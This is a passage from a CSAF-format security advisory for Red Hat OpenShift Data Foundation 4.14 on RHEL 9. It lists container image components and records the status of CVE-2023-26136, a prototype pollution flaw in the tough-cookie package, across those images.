"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le"
},
"product_reference": "odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64"
},
"product_reference": "odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x"
},
"product_reference": "odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64"
},
"product_reference": "odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x"
},
"product_reference": "odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le"
},
"product_reference": "odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64"
},
"product_reference": "odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x"
},
"product_reference": "odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64"
},
"product_reference": "odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le"
},
"product_reference": "odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x"
},
"product_reference": "odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le"
},
"product_reference": "odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64"
},
"product_reference": "odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le"
},
"product_reference": "odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x"
},
"product_reference": "odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64"
},
"product_reference": "odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64"
},
"product_reference": "odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64 as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64"
},
"product_reference": "odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le"
},
"product_reference": "odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x as a component of RHODF 4.14 for RHEL 9",
"product_id": "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x"
},
"product_reference": "odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x",
"relates_to_product_reference": "9Base-RHODF-4.14"
}
]
},
"vulnerabilities": [
{
"acknowledgments": [
{
"names": [
"Kokorin Vsevolod"
]
}
],
"cve": "CVE-2023-26136",
"cwe": {
"id": "CWE-1321",
"name": "Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)"
},
"discovery_date": "2023-07-03T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2219310"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the tough-cookie package which allows Prototype Pollution due to improper handling of Cookies when using CookieJar in rejectPublicSuffixes=false mode. This issue arises from the manner in which the objects are initialized.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "tough-cookie: prototype pollution in cookie memstore",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le",
